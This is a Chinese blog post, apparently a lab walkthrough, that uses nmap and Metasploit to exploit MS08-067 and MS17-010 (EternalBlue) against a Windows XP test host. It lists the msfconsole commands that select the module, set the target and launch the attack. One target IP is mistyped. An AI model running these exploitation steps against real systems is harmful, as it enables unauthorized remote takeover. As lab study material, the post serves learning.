使用metasploit漏洞测试

最新推荐文章于 2023-06-24 14:32:38 发布
最新推荐文章于 2023-06-24 14:32:38 发布
阅读量2.1k 收藏 7
点赞数
分类专栏: 渗透测试 文章标签: metasploit使用 漏洞利用 ms08-067 ms17-010
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37431937/article/details/100824623
版权

没网闲着无聊,灵魂无处安放呀,就简单的用metasploit玩玩。

实验环境:

目标主机:Windows XP professional

攻击机: kali linux

1.漏洞扫描 

nmap --script=vuln 172.20.10.5

扫描结果提示,易受攻击的有:

1.CVE-2008-4250 Microsoft Windows系统易受远程代码执行攻击(MS08-067)
2.CVE-2017-0143 Microsoft SMBV1服务器中的远程代码执行漏洞(MS17-010)

以上述两个为例学习使用metasploit漏洞利用模块进行攻击:

2.漏洞利用

实例一:使用MS08-067模块进行攻击测试

命令:
启动Metasploit:msfconsole
        msf5 >:search ms08_067 /*查找可用的攻击模块*/
        msf5 >:use exploit/windows/smb/ms08_067_netapi  //使用模块

输入info 可用目标主机,本次环境目标为34 ,设置目标环境set target 34

显示payload 需要设置的项,如下图需要设置目标主机,设置好后执行攻击

msf5 >:set target 34   //设置目标主机的系统版本,防止语言导致攻击失败
msf5 >:show payload    //显示需要设置的项
msf5 >:set rhost  127.20.10.5 //设置目标主机Ip 
msf5 >:exploit      //执行攻击

成功后meterpreter输入shell即可远程执行相关任务,查看用户名等操作。

实例二:利用MS17-010进行攻击测试,同里查看可用的攻击模块

同样的我们这次选用eternalblue smb远程windows内核池破坏

设置好相关参数后开始执行攻击,由于目标主机重启后未激活,导致利用漏洞攻击成功,但未能建立会话,目标主机正常启动就能成功建立会话。

系统未激活导致无法进入,建立连接。

 

总体来说在漏洞测试方面,metasploit是非常强,简单高效的操作提高工作效率

 

PwnGuo
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Metasploit学习实验记录
maoyeyedezhihui的博客
04-15 487
Metasploit学习实验记录 环境搭建 笔记本运行虚拟机不能卡,本热辣鸡本,重新换了一块固态硬盘,现在体验很好; 下载并安装VMware; 下载并安装Linux kali,kali自带metasploit; 下载并安装Windows xp sp2,注意要下载纯净版的,即ios,漏洞没有打补丁,点击这里去下载; 在安装Windows xp sp2的过程中出现无法连网的问题,是因为ios中没有自...
Metasploit+beef攻击实验
10-12
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。
Metasploit实验
mingyqf的博客
12-05 2430
实验二 Metasploit 1、实验目的 通过本实验可以: 1)掌握Metasploit的基本概念 2)掌握Metasploit对各个平台的木马下放 3)掌握经典漏洞MS17-010 2、实验环境 本实验需准备: Kali虚拟机 2)Windows虚拟机 3)Centos/Ubuntu虚拟机 3、实验需求 1)将渗透主机KALI,Windows与Metasploitable2的网卡连接模式设置为NAT模式 Kali: Windows7: metasploitable2: 2)使用metaspoit
Metasploit渗透测试实验报告
weixin_30657999的博客
05-18 284
Metasploit渗透测试实验报告 转载于:https://www.cnblogs.com/zlslch/p/6872375.html
Metasploit 魔鬼训练营》02 渗透测试实验环境
kevinhanser
08-23 4104
1. 系统环境(Vmware Workstation) 2 . 渗透测试实验环境的搭建
metasploit使用lnk漏洞渗透测试.doc
03-18
选择合适的 Payload 并设置为测试使用的Payload。例如,使用 `set PAYLOAD <名称>` 命令设置Payload。 六、设置目标机 IP 设置目标机的 IP 地址,例如 `set RHOST 192.168.1.175`。 七、生成漏洞利用程序 使用 `...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
Metasploit渗透测试指南 修订版
09-21
接下来,书中的重点会放在exploit的使用上,讲解如何利用Metasploit框架执行各种类型的攻击,如缓冲区溢出、SQL注入和远程命令执行等。此外,还会介绍payload的选择和定制,以及如何实现持久化访问,如创建后门。 ...
Metasploit渗透测试指南(全) .pdf
12-23
书中还会详细探讨如何使用Metasploit来发现和利用网络服务中的漏洞。这包括扫描目标网络,识别开放端口和服务,然后选择相应的exploit进行攻击。通过实例,读者将学习如何编写和使用自定义exploits,以应对那些没有...
Metasploit漏洞攻击实战
04-12
Metasploit漏洞攻击实战
使用Metasploit实现渗透攻击
最新发布
2201_76043604的博客
06-24 1140
网络渗透攻击是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一, 危害性也非常严重。例如 ,攻击者会有针对性地对某个目标网络进行攻击,以获取其内部的商业资料,进行网络破坏等。因此,攻击者实施攻击的步骤是非常系统的,假设其获取了目标网络中网站服务器的权限,则不会仅满足于控制此台服务器,而是会利用此台服务器, 继续入侵目标网络,获取整个网络中所有主机的权限。二、Metasploit本次实验主要讲解了(1)Metasploit的基础使用和方法基本命令。
如何使用Metasploit进行后渗透攻击
m0_74131821的博客
05-29 1273
后渗透攻击(PostExploitation)是整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节
exploit已完成,但没有创建会话exploit completed, but no session was created
热门推荐
08-22 1万+
The "no session was created" message occurs if one of the following happens: 1) The exploit you use doesn't work against the target you selected. Could be the exploit is for a different ve...
漏洞验证之metasploit实战
whoim_i的博客
10-23 5530
一、metasploit简介 Metasploit 是一款开源的渗透测试框架平台,可以用来信息收集、漏洞探测、漏洞利用等 渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的 Metasploit 是采用 Perl 语言编写的,但是再后来的新版中,改成了用 Ruby 语言编写的了,这使得使用者能够根 据需要对模块进行适当修改,甚至是调用自己写的测试模块。到目前为止,msf 已经内置了...
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)
渗透、攻防、CTF、编程
10-12 3461
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境) 0x01 知识点 MSF工具的利用,ms17-010漏洞实验 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.129) 目标机:win7(ip:192.168.233.130) 0x03 实验准备 启动msf,输入msfconsole 检错漏洞库,输入search ms ,盐城msf库里存在ms17-010漏洞 3、nmap检测目标机开放端口 nmap –..
Kali利用msf对MS10_061漏洞进行渗透测试
venu_s的博客
12-27 7043
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码...
Metasploit漏洞攻击 Metasploit漏洞攻击
菜鸟-传奇
12-06 1775
Metasploit漏洞攻击 Metasploit是一款开源的安全漏洞检测工具,Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制(payload)、编码器(encode)、...
Metasploit靶机漏洞实践检验
Birldlee的博客
12-27 1万+
使用Metasploit渗透测试软件对Metasploitable靶机系统主机进行攻击,检验各种常见靶机漏洞的情况。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值